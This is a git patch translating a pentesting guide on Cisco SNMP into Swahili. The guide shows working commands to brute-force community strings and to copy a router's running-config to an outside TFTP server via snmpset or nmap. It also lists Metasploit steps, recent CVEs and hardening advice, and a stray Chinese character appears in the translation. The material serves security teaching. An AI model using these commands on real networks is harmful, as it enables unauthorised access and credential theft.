From ab3014a198a624f23a55e8071906acd57cd7511d Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 20 Aug 2025 10:16:35 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-snmp/cisco-snmp. --- .../pentesting-snmp/cisco-snmp.md | 102 ++++++++++++++---- 1 file changed, 80 insertions(+), 22 deletions(-) diff --git a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md index 2f9e08d4d..f0e712bba 100644 --- a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -4,34 +4,92 @@ ## Pentesting Cisco Networks -**SNMP** inafanya kazi juu ya UDP na bandari 161/UDP kwa ujumbe wa jumla na 162/UDP kwa ujumbe wa mtego. Protokali hii inategemea nyuzi za jamii, zinazofanya kazi kama nywila zinazowezesha mawasiliano kati ya wakala wa SNMP na seva. Nyuzi hizi ni muhimu kwani zinatambulisha viwango vya ufikiaji, haswa **kusoma tu (RO) au ruhusa za kusoma-kandika (RW)**. Njia maarufu ya shambulio kwa wapentester ni **kujaribu nguvu za nyuzi za jamii**, lengo likiwa kuingia kwenye vifaa vya mtandao. +**SNMP** inafanya kazi juu ya UDP na bandari **161/UDP** kwa ujumbe wa jumla na **162/UDP** kwa ujumbe wa mtego. Protokali hii inategemea *nyuzi za jamii*, zinazofanya kazi kama "nywila" za maandiko zinazowezesha mawasiliano kati ya wakala wa SNMP na wasimamizi. Nyuzi hizi zinatambulisha kiwango cha ufikiaji, haswa **kusoma tu (RO) au ruhusa za kusoma-na-k写 (RW)**. -Chombo cha vitendo kwa ajili ya kutekeleza mashambulizi kama haya ya nguvu ni [**onesixtyone**](https://github.com/trailofbits/onesixtyone), ambacho kinahitaji orodha ya nyuzi za jamii zinazoweza kuwa na anwani za IP za malengo: +Njia ya shambulio ya jadi—hata hivyo bado yenye ufanisi sana—ni **kuvunjavunja nyuzi za jamii** ili kupandisha kutoka kwa mtumiaji asiyeidhinishwa hadi msimamizi wa kifaa (RW jamii). Chombo cha vitendo kwa kazi hii ni [**onesixtyone**](https://github.com/trailofbits/onesixtyone): ```bash -onesixtyone -c communitystrings -i targets +onesixtyone -c community_strings.txt -i targets.txt ``` -#### `cisco_config_tftp` - -Mfumo wa Metasploit una moduli ya `cisco_config_tftp`, inayorahisisha uchimbaji wa mipangilio ya kifaa, kulingana na kupata nywila ya RW jamii. Vigezo muhimu kwa ajili ya operesheni hii ni: - -- Nywila ya RW jamii (**COMMUNITY**) -- IP ya mshambuliaji (**LHOST**) -- IP ya kifaa kilichokusudiwa (**RHOSTS**) -- Njia ya marudio kwa ajili ya faili za mipangilio (**OUTPUTDIR**) - -Baada ya kuweka mipangilio, moduli hii inaruhusu upakuaji wa mipangilio ya kifaa moja kwa moja kwenye folda iliyotajwa. - -#### `snmp_enum` - -Moduli nyingine ya Metasploit, **`snmp_enum`**, inajikita katika kukusanya taarifa za kina za vifaa vya hardware. Inafanya kazi na aina yoyote ya nywila ya jamii na inahitaji anwani ya IP ya lengo kwa ajili ya utekelezaji mzuri: +Mchango mwingine wa haraka ni skripti ya Nmap NSE `snmp-brute` au moduli ya SNMP ya Hydra: ```bash -msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public -msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10 -msf6 auxiliary(scanner/snmp/snmp_enum) > exploit +nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24 +hydra -P wordlist.txt -s 161 10.10.10.1 snmp ``` +--- + +### Kutolea nje usanidi kupitia SNMP (CISCO-CONFIG-COPY-MIB) +Ikiwa unapata **RW community** unaweza nakili usanidi unaotumika/usanidi wa kuanzisha kwenye seva ya TFTP/FTP *bila ufikiaji wa CLI* kwa kutumia CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`). Njia mbili za kawaida ni: + +1. **Nmap NSE – `snmp-ios-config`** +```bash +nmap -sU -p161 --script snmp-ios-config \ +--script-args creds.snmp=private 192.168.66.1 +``` +Scripti inaratibu kiotomatiki operesheni ya nakala na kuchapisha usanidi kwenye stdout. + +2. **Mfuatano wa `snmpset` wa Kichwa** +```bash +# Copy running-config (4) to a TFTP server (1) – random row id 1234 +snmpset -v2c -c private 192.168.66.1 \ +1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \ # protocol = tftp +1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \ # sourceFileType = runningConfig +1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \ # destFileType = networkFile +1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP +1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\ +1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4 # rowStatus = createAndGo +``` +Row identifiers ni *one-shot*; matumizi tena ndani ya dakika tano yanachochea makosa ya `inconsistentValue`. + +Mara faili likiwa kwenye seva yako ya TFTP unaweza kuchunguza akidi (`enable secret`, `username secret`, nk.) au hata kusukuma mabadiliko ya usanidi nyuma kwenye kifaa. + +--- + +### Metasploit goodies + +* **`cisco_config_tftp`** – inashusha running-config/startup-config kupitia TFTP baada ya kutumia MIB hiyo hiyo. +* **`snmp_enum`** – inakusanya taarifa za hesabu ya kifaa, VLANs, maelezo ya kiunganishi, ARP tables, nk. +```bash +use auxiliary/scanner/snmp/snmp_enum +set RHOSTS 10.10.100.10 +set COMMUNITY public +run +``` +--- + +## Uthibitisho wa hivi karibuni wa Cisco SNMP (2023 – 2025) +Kufuatilia taarifa za wauzaji ni muhimu ili kubaini fursa za *zero-day-to-n-day* ndani ya ushirikiano: + +| Mwaka | CVE | Kipengele kilichohusika | Athari | +|------|-----|-----------------|--------| +| 2025 | CVE-2025-20174 | SNMP subsystem | Pakiti iliyoundwa inasababisha *DoS* (reload) iliyothibitishwa kwenye IOS/IOS-XE (v1/v2c/v3). | +| 2024 | CVE-2024-20373 | Usimamizi wa IPv4 ACL | ACLs **extended** zilizowekwa vibaya zinashindwa kimya, zikiruhusu upimaji wa SNMP usio na uthibitisho wakati jamii/katumia halali inajulikana. | +| 2025 | (hakuna CVE bado) | Kupita kwa vizuizi vya usanidi wa SNMPv3 | Mtumiaji halali wa v3 anaweza kupima kutoka anwani ambazo zinapaswa kukataliwa. | + +Uwezekano wa kutumia mara nyingi bado unategemea kuwa na nywila ya jamii au akidi za v3—sababu nyingine kwa nini kujaribu kwa nguvu bado kuna umuhimu. + +--- + +## Vidokezo vya Kuimarisha & Kugundua + +* Pandisha toleo lililosahihishwa la IOS/IOS-XE (angalia taarifa ya Cisco kwa CVE hapo juu). +* Prefer **SNMPv3** na `authPriv` (SHA-256/AES-256) badala ya v1/v2c. +``` +snmp-server group SECURE v3 priv +snmp-server user monitor SECURE v3 auth sha priv aes 256 +``` +* Fungamanisha SNMP na VRF ya usimamizi na **punguza kwa *standard* nambari za IPv4 ACLs** (ACLs zenye majina za extended ni hatari – CVE-2024-20373). +* Zima **RW communities**; ikiwa inahitajika kwa operesheni, zipunguze kwa ACL na maoni: +`snmp-server community RW 99 view SysView` +* Fuata: +- Spike za UDP/161 au vyanzo visivyotarajiwa (sheria za SIEM). +- Matukio ya `CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource` yanayoashiria mabadiliko ya usanidi nje ya bendi. +* Wezesha **SNMPv3 logging** na `snmp-server packetsize 1500` ili kupunguza njia fulani za DoS. + +--- + ## Marejeleo -- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) - +- Cisco: *Jinsi ya Nakili Mipangilio Kwa na Kutoka kwa Vifaa vya Cisco Kwa Kutumia SNMP* +- Taarifa ya Usalama ya Cisco *cisco-sa-snmp-uwBXfqww* (CVE-2024-20373) {{#include ../../banners/hacktricks-training.md}}